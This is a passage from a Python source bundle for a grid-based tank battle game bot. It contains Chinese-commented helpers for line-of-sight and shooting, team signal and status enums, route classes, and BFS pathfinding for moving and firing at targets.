Action.get_action(x1, y1, x3, y3) + 4 # 射击行为一定成功 actions.append(action) else: # 其他都是不适用的 continue return actions def move_to(self, oppTank): """ 返回 self -> oppTank 的移动 Input: oppTank TankField/BattleTank 所有带坐标的 tank 对象 """ x1, y1 = self._tank.xy x2, y2 = oppTank.xy assert x1 == x2 or y1 == y2, "can't be used when two tanks are not in line" return Action.get_action(x1, y1, x2, y2) def shoot_to(self, oppTank): """ 返回 self -> oppTank 的射击行为,相当于 move + 4 """ return self.move_to(oppTank) + 4 def on_the_same_line_with(self, field, ignore_brick=True): """ 是否和某个块处在同一条直线上 Input: field 任何带坐标的 tank 对象 ignore_brick bool 是否忽略土墙的阻挡 """ tank = self._tank map_ = self._map x1, y1 = tank.xy x2, y2 = field.xy if x1 != x2 and y1 != y2: # 坐标上直接可以否掉的情况 return False elif (x1, y1) == (x2, y2): # 重叠,这种情况一般不会出现,但是还是判断一下 return True if x1 == x2: dx = 0 dy = np.sign(y2 - y1) elif y1 == y2: dx = np.sign(x2 - x1) dy = 0 x, y = tank.xy while True: x += dx y += dy if not map_.in_map(x, y): break _fields = map_[x, y] if len(_fields) == 0: continue elif len(_fields) == 2: if field.xy == (x, y): # 说明处在在多人坦克里 return True else: # 否则不算 return False else: _field = _fields[0] if _field.xy == field.xy: # 和这个块坐标相同(注意不要用 is 来判断,因为传入的可能是 BattleTank) return True elif isinstance(_field, (EmptyField, WaterField) ): continue elif isinstance(_field, BrickField): if ignore_brick: # 这种情况将 brick 视为空 continue else: return False else: return False # 其他所有的 block 类型均视为 False # 没有检查到受阻的情况,那么就是在同一条直线上了 return True def back_away_from(self, oppTank): """ 背向远离地方坦克 """ return (self.move_to(oppTank) + 2) % 4 # 获得相反方向 def get_destroyed_fields_if_shoot(self, action): """ 如果向 action 对应的方向射击,那么可以摧毁什么东西? ------------------------------------------------------------ 主要用于 move 不安全而又不想白白等待的情况,尝试采用进攻开路 也可以用于其他问题的判断 Input: - action int 原始的移动行为(虽然事实上也可以是射击 :) Return: - fields [Field] 将被摧毁的对象 """ assert Action.is_move(action) or Action.is_shoot(action) tank = self._tank map_ = self._map action %= 4 x, y = tank.xy dx, dy = Action.DIRECTION_OF_ACTION_XY[action] while True: x += dx y += dy if not map_.in_map(x, y): break fields = map_[x, y] if len(fields) == 0: # 没有对象 continue elif len(fields) > 1: # 多辆坦克 return fields else: field = fields[0] if isinstance(field, (WaterField, EmptyField) ): continue elif isinstance(field, SteelField): return [] else: return fields return [] def will_destroy_a_brick_if_shoot(self, action): """ 如果当前回合射击,是否能够摧毁一个墙 """ destroyedFields = self.get_destroyed_fields_if_shoot(action) if len(destroyedFields) == 1: field = destroyedFields[0] if isinstance(field, BrickField): return True return False def is_face_to_enemy_base(self, ignore_brick=False): """ 是否直面对方基地,或者是与敌人基地处在同一条直线上 (一个历史遗留接口) Input: - ignore_brick bool 是否忽略土墙,如果忽略,那么只需要基地和坦克 处在同一直线上即可 """ oppBase = self._map.bases[1 - self.side] return self.on_the_same_line_with(oppBase, ignore_brick=ignore_brick) def is_closest_to(self, field, allow_diagonal=True): """ 是否紧贴某个 field 也就是与之相邻或恰为对角 Input: - field Field 事实上只要带有 xy 属性的类都可以 - allow_diagonal bool 是否将对角线关系也算入 """ x1, y1 = self.xy x2, y2 = field.xy isInnermost = ( np.abs(x1 - x2) <= 1 and np.abs(y1 - y2) <= 1 ) if allow_diagonal: return isInnermost else: return isInnermost and (x1 == x2 or y1 == y2) # 还需要共线 def get_enemy_behind_brick(self, action, interval=0): """ 返回行为对应的方向后的围墙后的敌人 乙方坦克和围墙间可以有任意空位 围墙到敌方坦克间至多有 interval 个空位 Input: - action int 移动/射击行为,确定方向 - interval int 最远检查到距离墙多远的位置? interval = 0 表示只检查最靠近墙的那个位置 特殊地 interval = -1 表示不限制 interval Return: - tank TankField/None 敌人对应的 tank 对象,多个敌人只返回一个 情况不符则返回 None """ tank = self._tank map_ = self._map x1, y1 = tank.xy dx, dy = Action.DIRECTION_OF_ACTION_XY[action % 4] # 检查前方是否是墙 x2, y2 = x1, y1 while True: x2 += dx y2 += dy if not map_.in_map(x2, y2): return None fields = map_[x2, y2] if len(fields) == 0: continue elif len(fields) > 1: return None else: field = fields[0] if isinstance(field, BrickField): break # 此时 x2, y2 位置上是一个 Brick elif isinstance(field, (WaterField, EmptyField) ): continue else: return None # 检查前方是否有敌方坦克 x3, y3 = x2, y2 currentInterval = -1 while True: currentInterval += 1 if interval != -1 and currentInterval > interval: break x3 += dx y3 += dy if not map_.in_map(x3, y3): break fields = map_[x3, y3] if len(fields) == 0: continue elif len(fields) > 1: for field in fields: if isinstance(field, TankField) and field.side != tank.side: return field else: field = fields[0] if isinstance(field, TankField) and field.side != tank.side: return field elif isinstance(field, (WaterField, EmptyField) ): continue else: # 除了水路和空地可以继续搜索外,其他情况均直接结束 break return None def has_enemy_behind_brick(self, action): return self.get_enemy_behind_brick(action) is not None def get_nearest_enemy(self): #, block_teammate=False, isolate=False): """ 获得最近的敌人,移动距离 Input: - isolate bool 是否只考虑离自己最近,而不从团队整体考虑 如果联系整个团队,那么离自己最近的敌人定义为与我之间间隔的步数 和与我的队友之间间隔的步数差最小的敌人 Return: - enemy TankField """ '''tank = self._tank map_ = self._map _enemies = map_.tanks[1 - tank.side] enemies = [ enemy for enemy in _enemies if not enemy.destroyed ] # 已经被摧毁的敌人就不考虑了 if len(enemies) == 0: # 胜利? return None if len(enemies) < 2: return enemies[0] # TODO: # 两种情况的决策顺序是有差别的,一个是见到走不通就 block_teammate = False 另一个是如果全部都走不通 # 就全部 block_teammate = False ,这可能会引发问题? if not isolate: # # 注:这是一个糟糕的设计,因为 BattleTank 对象最初被设计为只懂得单人决策的对象 # 他不应该知道队友的行为,但是此处打破了这个规则 # teammate = BattleTank( map_.tanks[tank.side][ 1 - tank.id ] ) if teammateBattler.destroyed: pass else: deltaLengthWithEnemyList = [] for enemy in enemies: route1 = self.get_route_to_enemy_by_move(enemy) if route1.is_not_found(): route1 = self.get_route_to_enemy_by_move(enemy, block_teammate=False) if route1.is_not_found(): # 我无法到达敌人的位置??? continue route2 = teammateBattler.get_route_to_enemy_by_move(enemy) if route2.is_not_found(): route2 = teammateBattler.get_route_to_enemy_by_move(enemy, block_teammate=False) if route2.is_not_found(): deltaLength = route1.length # 这样做是否合理? else: deltaLength = route1.length - route2.length deltaLengthWithEnemyList.append( (deltaLength, enemy) ) idx = deltaLengthWithEnemyList.index( min(deltaLengthWithEnemyList, key=lambda tup: tup[0]) ) return deltaLengthWithEnemyList[idx][1] # 否则为单人决策 routes = [ self.get_route_to_enemy_by_move(enemy) for enemy in enemies ] if all( route.is_not_found() for route in routes ): # 均不可到达? routes = [ self.get_route_to_enemy_by_move(enemy, block_teammate=False) for enemy in enemies ] # 因为队友阻塞 ? routeWithEnemyList = [ (route, enemy) for route, enemy in zip(routes, enemies) if not route.is_not_found() # 队友阻塞导致 -1 需要去掉 ] idx = routeWithEnemyList.index( min(routeWithEnemyList, key=lambda tup: tup[0].length) ) return routeWithEnemyList[idx][1]''' tank = self._tank map_ = self._map enemies = [ enemy for enemy in map_.tanks[1 - tank.side] if not enemy.destroyed ] # 已经被摧毁的敌人就不考虑了 battler = self teammate = BattleTank( map_.tanks[tank.side][ 1 - tank.id ] ) if not teammate.destroyed: return min( enemies, key=lambda enemy: battler.get_manhattan_distance_to(enemy) - teammate.get_manhattan_distance_to(enemy) ) # 综合队友的情况进行考虑,对方离我近,同时离队友远,那么那么更接近于我 else: return min( enemies, key=lambda enemy: battler.get_manhattan_distance_to(enemy) ) def check_is_outer_wall_of_enemy_base(self, field, layer=2): """ 检查一个 field 是否为敌方基地的外墙 外墙被视为基地外的 layer 层 Brick """ if not isinstance(field, BrickField): return False map_ = self._map tank = self._tank oppBase = map_.bases[1 - tank.side] x1, y1 = oppBase.xy x2, y2 = field.xy return ( np.abs( x1 - x2 ) <= layer and np.abs( y1 - y2 ) <= layer ) def get_enemy_delay_if_bypass_me(self, oppBattler): """ 假设自己不移动,敌人必须要饶过我,那么他将因此延迟多少步 """ route1 = oppBattler.get_shortest_attacking_route(ignore_enemies=True, bypass_enemies=False) route2 = oppBattler.get_shortest_attacking_route(ignore_enemies=False, bypass_enemies=True) if route1.is_not_found(): # TODO: 如何处理本来就找不到路的情况? return INFINITY_ROUTE_LENGTH if route2.is_not_found(): return INFINITY_ROUTE_LENGTH delay = route2.length - route1.length assert delay >= 0 # 显然必定会大于 0 ! return delay def can_block_this_enemy(self, oppBattler): """ 假设自己不移动,对方将不得不绕路,或者他将因此无路可走,那么就算是成功堵住了他 """ delay = self.get_enemy_delay_if_bypass_me(oppBattler) if delay == INFINITY_ROUTE_LENGTH: # 让敌人根本无路可走 return True return (delay >= 2) # 造成两步步以上的延迟,那么就算堵路成功 #{ END 'tank.py' }# #{ BEGIN 'strategy/signal.py' }# class Signal(object, metaclass=UniqueIntEnumMeta): __offset__ = 200 INVALID = -1 # 无效信号 NONE = 0 # 空信号 UNHANDLED = 1 # 未处理团队信号,通常是因为有更紧急的状况而没有运行到相应的处理信号的位置 CANHANDLED = 2 # 未能处理团队信号,通常是因为尝试处理但是发现不合适 PREPARE_FOR_BREAK_BRICK = 11 # 团队信号,准备破墙,先给自己寻找后路 READY_TO_PREPARE_FOR_BREAK_BRICK = 12 # 队员信号,准备好为破墙而凿开两边墙壁 FORCED_TO_BREAK_BRICK = 13 # 团队信号,强制破墙 READY_TO_BREAK_BRICK = 14 # 队员信号,准备要破墙 SUGGEST_TO_BREAK_OVERLAP = 15 # 团队信号,建议马上打破重叠 READY_TO_BREAK_OVERLAP = 16 # 队员信号,准备要主动打破重叠 FORCED_MARCH = 17 # 团队信号,强制行军 READY_TO_FORCED_MARCH = 18 # 队员信号,准备强制行军 SHOULD_LEAVE_TEAMMATE = 19 # 团队信号,需要和队友打破重叠 READY_TO_LEAVE_TEAMMATE = 20 # 队员信号,准备和队友打破重叠 SUGGEST_TO_BACK_AWAY_FROM_BRICK = 21 # 团队信号,建议反向远离墙壁 READY_TO_BACK_AWAY_FROM_BRICK = 22 # 队员信号,准备反向远离墙壁 @staticmethod def is_break(signal): """ 该信号是否意味着沟通停止 也就是是否为未处理或无法处理 """ return signal in ( __class__.INVALID, __class__.UNHANDLED, __class__.CANHANDLED, ) #{ END 'strategy/signal.py' }# #{ BEGIN 'strategy/status.py' }# class Status(object, metaclass=UniqueIntEnumMeta): __offset__ = 100 NONE = 0 # 空状态 AGGRESSIVE = 1 # 侵略性的 STALEMENT = 2 # 僵持的 DEFENSIVE = 3 # 防御性的 WITHDRAW = 4 # 撤退性的 DYING = 5 # 准备要挂了 DIED = 6 # 已经挂了 RELOADING = 9 # 正在装弹,下回合无法射击 ENCOUNT_ENEMY = 17 # 遇到敌人 ENCOUNT_ONE_ENEMY = 18 # 遇到一个敌人 ENCOUNT_TWO_ENEMY = 19 # 遇到两个敌人 OVERLAP_WITH_ENEMY = 20 # 正在和敌人重叠 KEEP_ON_MARCHING = 21 # 继续行军 READY_TO_ATTACK_BASE = 22 # 准备拆基地 READY_TO_FIGHT_BACK = 23 # 准备反击 READY_TO_DODGE = 24 # 准备闪避敌人 READY_TO_KILL_ENEMY = 25 # 准备击杀敌人 READY_TO_BLOCK_ROAD = 26 # 准备堵路 KEEP_ON_OVERLAPPING = 27 # 等待与自己重叠的敌人的决策 WAIT_FOR_MARCHING = 28 # 存在风险,等待进攻 HAS_ENEMY_BEHIND_BRICK = 29 # 隔墙有人 PREVENT_BEING_KILLED = 30 # 为了防止被射击而停下 HUNTING_ENEMY = 31 # 主动追杀敌军 ACTIVE_DEFENSIVE = 32 # 主动防御状态 WILL_DODGE_TO_LONG_WAY = 33 # 遭遇敌人自己没有炮弹,为了保命而闪避,但是增加了攻击路线长度 OPPOSITE_SHOOTING_WITH_ENEMY = 34 # 正在和敌人对射 READY_TO_BACK_AWAY = 35 # 假装逃跑 READY_TO_CLEAR_A_ROAD_FIRST = 36 # 进攻时预先清除与自己相隔一步的土墙 READY_TO_DOUBLE_KILL_ENEMIES = 37 # 遇到敌人重叠在一起,尝试和两个敌人同归于尽 READY_TO_LEAVE_TEAMMATE = 38 # 准备和队友打破重叠 FACING_TO_ENEMY_BASE = 39 # 正面敌人基地,或者和敌人基地处在同一直线上 READY_TO_FOLLOW_ENEMY = 40 # 准备跟随墙后敌人的移动方向 READY_TO_WITHDRAW = 41 # 准备后撤 GRARD_OUR_BASE = 42 # 已经到达我方基地附近,进入守卫状态 STAY_FOR_GUARDING_OUR_BASE = 43 # 已经到达我方基地附近,准备停留等待 WAIT_FOR_WITHDRAWING = 44 # 等待回防,可能是由于敌人阻挡 MOVE_TO_ANOTHER_GUARD_POINT = 45 # 向着另一个 guard point 移动 ENEMY_MAY_APPEAR_BEHIND_BRICK = 46 # 也许会有敌人出现在墙后 READY_TO_CUT_THROUGH_MIDLINE = 47 # 墙后停止不前时,准备打通中线 TRY_TO_BREAK_ALWAYS_BACK_AWAY = 48 # 尝试打破一直回头的状态 FORCED_MARCHING = 49 # 强制行军,强攻,不考虑某些可能的风险 FORCED_WITHDRAW = 50 # 强制撤退,不考虑可能的风险 READY_TO_PREPARE_FOR_BREAK_BRICK = 51 # 准备为破墙而准备闪避路线 READY_TO_BREAK_BRICK = 52 # 准备破墙 READY_TO_BREAK_OVERLAP = 53 # 准备主动打破重叠 READY_TO_FORCED_MARCH = 54 # 准备主动强攻 FORCED_STOP_TO_PREVENT_TEAM_HURT = 55 # 防止团队间相互攻击而强制停止 READY_TO_BACK_AWAY_FROM_BRICK = 56 # 准备主动反向远离墙壁 HELP_TEAMMATE_ATTACK = 57 # 合作拆家,并且帮助队友进攻 ATTEMPT_TO_KILL_ENEMY = 58 # 主动防御时,尝试击杀敌军,这个状态可以用来记忆行为 BLOCK_ROAD_FOR_OUR_BASE = 59 # 主动防御时,遇到敌方面向基地,但没有炮弹,自己又恰好能阻挡在中间 SACRIFICE_FOR_OUR_BASE = 60 # 主动防御时,遇到敌方下一炮打掉基地,自己又恰好能阻挡 __Status_Name_Cache = None @staticmethod def get_name(status): """ 通过状态值自动判定方法 """ if __class__.__Status_Name_Cache is None: cache = __class__.__Status_Name_Cache = {} for k, v in __class__.__dict__.items(): if not k.startswith("_"): if isinstance(v, int): key = k.title() cache[v] = key cache = __class__.__Status_Name_Cache return cache.get(status, None) # 应该保证一定有方法? #{ END 'strategy/status.py' }# #{ BEGIN 'strategy/label.py' }# class Label(object, metaclass=UniqueIntEnumMeta): __offset__ = 300 NONE = 0 BREAK_OVERLAP_SIMULTANEOUSLY = 1 # 会和我同时打破重叠 SIMULTANEOUSLY_SHOOT_TO_BREAK_OVERLAP = 2 # 回合我方同时以射击的方式打破重叠 IMMEDIATELY_BREAK_OVERLAP_BY_MOVE = 3 # 当敌人和我方坦克重叠时,对方立即与我打破重叠 KEEP_ON_WITHDRAWING = 4 # 我方坦克持久化撤退状态 DONT_WITHDRAW = 5 # 强制性要求一个队员不再防御 ALWAYS_BACK_AWAY = 6 # 我方坦克总是尝试回头 __Status_Name_Cache = None @staticmethod def get_name(status): """ 通过状态值自动判定方法 """ if __class__.__Status_Name_Cache is None: cache = __class__.__Status_Name_Cache = {} for k, v in __class__.__dict__.items(): if not k.startswith("_"): if isinstance(v, int): key = k.title() cache[v] = key cache = __class__.__Status_Name_Cache return cache.get(status, None) # 应该保证一定有方法? #{ END 'strategy/label.py' }# #{ BEGIN 'strategy/utils.py' }# def fake_map_matrix_T_without_enemy(map, mySide): """ 伪造一个没有敌方坦克的地图类型矩阵 WARNING: 首先检查是不是对方 tank ,因为可能遇到对方已经死亡或者两方坦克重合 这种时候如果己方坦克恰好在这个位置,就会被删掉,assert 不通过 """ map_ = map oppSide = 1 - mySide cMatrixMap = map_.matrix_T.copy() for oppTank in map_.tanks[oppSide]: if (cMatrixMap[oppTank.xy] == Field.TANK + 1 + oppSide or cMatrixMap[oppTank.xy] == Field.MULTI_TANK # 还需要考虑重叠的坦克 ): cMatrixMap[oppTank.xy] = Field.EMPTY return cMatrixMap def fake_map_matrix_T_thinking_of_enemy_as_steel(map, mySide): """ 伪造一个敌方坦克视为钢墙的地图类型矩阵 用于在堵路时估计对方时候存在绕路的可能 """ map_ = map oppSide = 1 - mySide cMatrixMap = map_.matrix_T.copy() for oppTank in map_.tanks[oppSide]: if (cMatrixMap[oppTank.xy] == Field.TANK + 1 + oppSide or cMatrixMap[oppTank.xy] == Field.MULTI_TANK # 还需要考虑重叠的坦克 ): cMatrixMap[oppTank.xy] = Field.STEEL return cMatrixMap def get_manhattan_distance(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 曼哈顿距离 """ return np.abs(x1 - x2) + np.abs(y1 - y2) #{ END 'strategy/utils.py' }# #{ BEGIN 'strategy/route.py' }# INFINITY_WEIGHT = -1 # 无穷大的权重,相当于不允许到达 INFINITY_ROUTE_LENGTH = -1 # 无穷大的路径长度,相当于找不到路径 DUMMY_ACTION = -2 # 空行为 NONE_ACTION = -1 # 上回合什么都不做,相当于停止,专门用于 start == end 的情况 MOVE_ACTION = 0 # 上一回合操作标记为搜索 SHOOT_ACTION = 1 # 上一回合操作标记为射击 NONE_POINT = (-1, -1) # 没有相应的坐标 class RouteNode(object): """ 路径节点 ----------------- 搜索得到路径后,用于对路径的节点进行对象化的描述 Property: - x int 坐标 x - y int 坐标 y - xy (int, int) 坐标 (x, y) - weight int 节点权重,相当于走过这个节点需要多少步 - arrivalAction int 通过什么方式到达这个节点的 """ def __init__(self, x, y, weight=1, arrival_action=DUMMY_ACTION): self._x = x self._y = y self._weight = weight self._arrivalAction = arrival_action @property def x(self): return self._x @property def y(self): return self._y @property def xy(self): return (self._x, self._y) @property def weight(self): return self._weight @property def arrivalAction(self): return self._arrivalAction def from_shooting_area(self): return self._arrivalAction == SHOOT_ACTION def from_moving_area(self): return self._arrivalAction == MOVE_ACTION def __repr__(self): return str( (self._x, self._y, self._weight, self._arrivalAction) ) def __copy__(self): return self def __deepcopy__(self): return RouteNode(self._x, self._y, self._weight, self._arrivalAction) class Route(object): """ 路径类 ----------------- 用于对搜索得到的路径进行对象化的描述 Property: - nodes [RouteNode] 从 start -> end 的节点链 - length int 路径长度 - start (x, y) 起点坐标 - end (x, y) 终点坐标 Method: - is_not_found - has_block """ def __init__(self, node_chain=None): """ Input: ------------------------------------ - node_chain 节点链的 head ,对应着最后一步到达的节点 其中的节点是符合如下结构的 list def struct Node: [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,该情况为移动 ] """ self._nodeChain = self._get_dummy_head(node_chain) # 添加一个 dummy head 用于遍历 @staticmethod def _get_dummy_head(head=None): """ 添加在原始 node chain head 前的 dummy head ,方便遍历 """ return [ NONE_POINT, head, # 指向路径终点 end -1, -1, DUMMY_ACTION, ] @CachedProperty def nodes(self): nodes = [] currentNode = self._nodeChain while True: currentNode = currentNode[1] if currentNode is not None: x, y = currentNode[0] weight = currentNode[3] action = currentNode[4] nodes.append( RouteNode(x, y, weight, action) ) else: break nodes.reverse() return nodes def is_not_found(self): """ 是否是空路径,即没有找到可以到达终点的路径 """ return ( len(self.nodes) == 0 ) @CachedProperty def length(self): """ 获得路径长度,相当于节点权重的加和 如果没有找到路线,那么返回 INFINITY_ROUTE_LENGTH """ if self.is_not_found(): return INFINITY_ROUTE_LENGTH return np.sum( node.weight for node in self.nodes ) @property def start(self): """ 路径起点 如果没有找到路径,那么返回 NONE_POINT """ if self.is_not_found(): return NONE_POINT return self.nodes[0].xy @property def end(self): """ 路径终点 如果没有找到路径,那么返回 NONE_POINT """ if self.is_not_found(): return NONE_POINT return self.nodes[-1].xy def has_block(self, field): """ 判断一个 block 类型的 field (Brick/Base/Tank) 是否在该路径上 所谓的 block 类型指的是:必须要射击一次才能消灭掉 """ assert isinstance(field, (BrickField, BaseField, TankField) ), "%r is not a block field" % field for node in self.nodes: if node.xy == field.xy: if node.weight >= 2 and node.arrivalAction == MOVE_ACTION: # 移动受阻 return True elif node.weight >= 1 and node.arrivalAction == SHOOT_ACTION: # 射击受阻 return True return False def __len__(self): return self.length def __getitem__(self, idx): return self.nodes[idx] def __iter__(self): yield from self.nodes def __contains__(self, xy): assert isinstance(xy, tuple) and len(xy) == 2, "(x, y) is required" for node in self.nodes: if node.xy == xy: return True return False def __repr__(self): return "Route(%s)" % self.nodes def __copy__(self): return self def __deepcopy__(self): return Route(deepcopy(self._nodeChain)) #{ END 'strategy/route.py' }# #{ BEGIN 'strategy/search.py' }# # y-axis first / vertical first / aggressive DIRECTIONS_URDL = ( (0, -1), ( 1, 0), (0, 1), (-1, 0) ) # 上右下左 DIRECTIONS_ULDR = ( (0, -1), (-1, 0), (0, 1), ( 1, 0) ) # 上左下右 DIRECTIONS_DRUL = ( (0, 1), ( 1, 0), (0, -1), (-1, 0) ) # 下右上左 DIRECTIONS_DLUR = ( (0, 1), (-1, 0), (0, -1), ( 1, 0) ) # 下左上右 # x-axis first / horizontal first / defensive DIRECTIONS_RULD = ( ( 1, 0), (0, -1), (-1, 0), (0, 1) ) # 右上左下 DIRECTIONS_LURD = ( (-1, 0), (0, -1), ( 1, 0), (0, 1) ) # 左上右下 DIRECTIONS_RDLU = ( ( 1, 0), (0, 1), (-1, 0), (0, -1) ) # 右下左上 DIRECTIONS_LDRU = ( (-1, 0), (0, 1), ( 1, 0), (0, -1) ) # 左下右上 DEFAULT_BLOCK_TYPES = ( Field.STEEL, Field.WATER, ) DEFAULT_DESTROYABLE_TYPES = ( Field.BRICK, ) #------------------------ # 通常需要额外考虑的类型有 # # 1. 两方基地 # 2. 己方坦克和对方坦克 #------------------------ def get_searching_directions(x1, y1, x2=None, y2=None, x_axis_first=False, middle_first=False): """ 获得从 (x1, y1) -> (x2, y2) 最优的搜索方向顺序 Input: - (x1, y1) 起点坐标 - (x2, y2) 终点坐标,可以没有,那么将通过 (x1, y1) 在地图中的相对位置, 对应着左上、左下、右上、右下四个区域,确定最佳的搜索顺序 - x_axis_first bool 是否采用 x 轴方向优先的搜索方式。默认以垂直方向优先, 也就是如果存在到达目标坐标的两条长度相同的路径, 会优先从 y 轴方向移动过去,即先上下移动,后左右移动。 若选择以水平方向优先,则先左右移动,后上下移动。 优先上下移动通常用于侵略,优先左右移动通常用于防御 - middle_first bool 是否采用中路优先的搜索方式。默认不采用,而是优先从边路 搜索,如果边路和中路有距离相等的路径,那么优先从边路 走,如果中路发生冲突,就可以减小被敌人牵制的概率 注: x 轴优先仅仅在中路优先的成立下才有意义,如果是旁路搜索,则对 x 轴优先的 设置是无效的 """ if x2 is None or y2 is None: # 如果 x2, y2 为空,则默认以地图中点作为目标 x2 = MAP_WIDTH // 2 y2 = MAP_HEIGHT // 2 if ( x2 - x1 >= 0 ) and ( y2 - y1 >= 0 ): if middle_first: return DIRECTIONS_DRUL if not x_axis_first else DIRECTIONS_RDLU else: return DIRECTIONS_LDRU elif ( x2 - x1 >= 0 ) and ( y2 - y1 <= 0 ): if middle_first: return DIRECTIONS_URDL if not x_axis_first else DIRECTIONS_RULD else: return DIRECTIONS_LURD elif ( x2 - x1 <= 0 ) and ( y2 - y1 >= 0 ): if middle_first: return DIRECTIONS_DLUR if not x_axis_first else DIRECTIONS_LDRU else: return DIRECTIONS_RDLU elif ( x2 - x1 <= 0 ) and ( y2 - y1 <= 0 ): if middle_first: return DIRECTIONS_ULDR if not x_axis_first else DIRECTIONS_LURD else: return DIRECTIONS_RULD raise Exception def _BFS_search_all_routes_for_move(start, end, map_matrix_T, weight_matrix_T, block_types=DEFAULT_BLOCK_TYPES, x_axis_first=False, middle_first=False): """ BFS 搜索从 start -> end 的所有路径路径,由短到长依次返回 ---------------------------------------------------------------------------- Input: - start (int, int) 起始坐标 (x1, y2) - end (int, int) 终点坐标 (x2, y2) ,其对应的 field 类型必须不在 block_types 的定义里,否则查找到的路径为空 - map_matrix_T np.array( [[int]] ) field 类型值的矩阵的转置,坐标形式 (x, y) - weight_matrix_T np.array( [[int]] ) 每个格子对应节点的权重,形状与坐标形式同上 - block_types [int] 不能够移动到的 field 类型 WARNING: 需要自行指定不能够到达的基地、坦克的类型 - x_axis_first bool 是否优先搜索 x 轴方向 - middle_first bool 是否采用中路优先的搜索 Yield From: - routes [Route] 所有可以到达的路径。如果没有搜索到可以到达的路径,则返回空路径 ---------------------------------------------------------------------------- def struct Node: // 定义节点模型 [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,该情况为移动 ] """ x1, y1 = start x2, y2 = end width, height = map_matrix_T.shape # width, height 对应着转置前的 宽高 matrixMap = map_matrix_T matrixWeight = weight_matrix_T matrixCanMoveTo = np.ones_like(matrixMap, dtype=np.bool8) for _type in block_types: matrixCanMoveTo &= (matrixMap != _type) # debug_print("map:\n", matrixMap.T) # debug_print("weight:\n", matrixWeight.T) # debug_print("can move on:\n", matrixCanMoveTo.astype(np.int8).T) startNode = [ (x1, y1), None, 0, # 初始节点本来就已经到达了 0, # 初始节点不耗费步数 NONE_ACTION, ] queue = deque() # queue( [Node] ) matrixMarked = np.zeros_like(matrixMap, dtype=np.bool8) if DEBUG_MODE: matrixDistance = np.full_like(matrixMap, -1) queue.append(startNode) # init _foundRoute = False while len(queue) > 0: node = queue.popleft() if node[2] > 0: # 还剩 step 步 node[2] -= 1 queue.append(node) # 相当于下一个节点 continue x, y = node[0] if (x, y) == end: # 到达终点 _foundRoute = True yield Route(node) continue if matrixMarked[x, y]: continue matrixMarked[x, y] = True if DEBUG_MODE: matrixDistance[x, y] = _get_route_length_by_node_chain(node) for dx, dy in get_searching_directions(x1, x2, y1, y2, x_axis_first=x_axis_first, middle_first=middle_first): x, y = node[0] x3 = x + dx y3 = y + dy if (not (0 <= x3 < width and 0 <= y3 < height) # not in map or not matrixCanMoveTo[x3, y3] ): continue weight = matrixWeight[x3, y3] queue.append([ (x3, y3), node, weight-1, weight, MOVE_ACTION, ]) ''' if DEBUG_MODE: debug_print("distance matrix:\n", matrixDistance.T) ''' if not _foundRoute: yield Route() # 空节点 def _BFS_search_all_routes_for_shoot(start, end, map_matrix_T, move_weight_matrix_T, shoot_weight_matrix_T, block_types=DEFAULT_BLOCK_TYPES, destroyable_types=DEFAULT_DESTROYABLE_TYPES, x_axis_first=False, middle_first=False): """ BFS 搜索从 start 开始到击中 end 的所有路径,由短到长依次返回 ---------------------------------------------------------------------------- 实现思路: 通过射击的方式能够比单纯通过移动的方式更快地接近目标,这是显而易见的,毕竟炮弹可以飞行。 于是,将地图划分为两个区域,一个是可以发动射击的区域,它们仅仅与目标处在同一行或同一列的位置上 另一个就是常规的移动可达的区域。搜索过程中对着两种情况下相应的节点权重做区分对待即可。 --------------------------------------------------------------------------- Input: - start (int, int) 起始坐标 (x1, y2) - end (int, int) 终点坐标 (x2, y2) ,其对应的 field 类型必须不在 destroyable_types 的定义里,否则查找到的路径为空 - map_matrix_T np.array( [[int]] ) field 类型值的矩阵的转置,坐标形式 (x, y) - move_weight_matrix_T np.array( [[int]] ) 移动到这个格子所需的步数 - shoot_weight_matrix_T np.array( [[int]] ) 炮弹到达这个格子所需的步数 - block_types [int] 不能够移动到的 field 类型 WARNING: 需要自行指定不能被攻击的基地、坦克的类型 - destroyable_types [int] 能够通过射击行为摧毁的 field 类型,未指定在这个变量里的 所有其他 field 类型均默认视为不可摧毁,在以射击的方式进行 搜索时,遇到这样的 field 会跳过 WARNING: 需要自行制定可以被摧毁的基地、坦克的类型 - x_axis_first bool 是否优先搜索 x 轴方向 - middle_first bool 是否采用中路优先的搜索 Yield From: - routes [Route] 所有可以到达的路径。如果没有搜索到可以到达的路径,则返回空路径 -------------------------------------------------------------------------- def struct Node: // 定义节点模型 [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,射击或移动 ] """ x1, y1 = start x2, y2 = end width, height = map_matrix_T.shape matrixMap = map_matrix_T matrixMoveWeight = move_weight_matrix_T matrixShootWeight = shoot_weight_matrix_T # 哪些位置可以移动到 matrixCanMoveTo = np.ones_like(matrixMap, dtype=np.bool8) for _type in block_types: matrixCanMoveTo &= (matrixMap != _type) # 那些位置上的 field 可以被摧毁 matrixCanBeDestroyed = np.zeros_like(matrixMap, dtype=np.bool8) for _type in destroyable_types: matrixCanBeDestroyed |= (matrixMap == _type) # 哪些位置可以对目标发动射击,即 end 向四个方向伸展开的区域 matrixCanShoot = np.zeros_like(matrixMap, dtype=np.bool8) matrixCanShoot[x2, y2] = True for dx, dy in get_searching_directions(x1, y1, x2, y2, x_axis_first=x_axis_first, middle_first=middle_first): x, y = end while True: x += dx y += dy if not (0 <= x < width and 0 <= y < height): break elif matrixMap[x, y] == Field.EMPTY: # 空对象 pass elif matrixMap[x, y] == Field.WATER: continue # 水路不可以发动射击,但是可以射过去 elif not matrixCanBeDestroyed[x, y] and (x, y) != start: break # 打一个补丁,不管怎么样,攻击者原地是可以发动射击的 ... matrixCanShoot[x, y] = True if (x, y) == start: # 已经找到了 start 没有必要再继续找下去了 break # debug_print("map:\n", matrixMap.T) # debug_print("weight of move:\n", matrixMoveWeight.T) # debug_print("weight of shoot:\n", matrixShootWeight.T) # debug_print("can move to:\n", 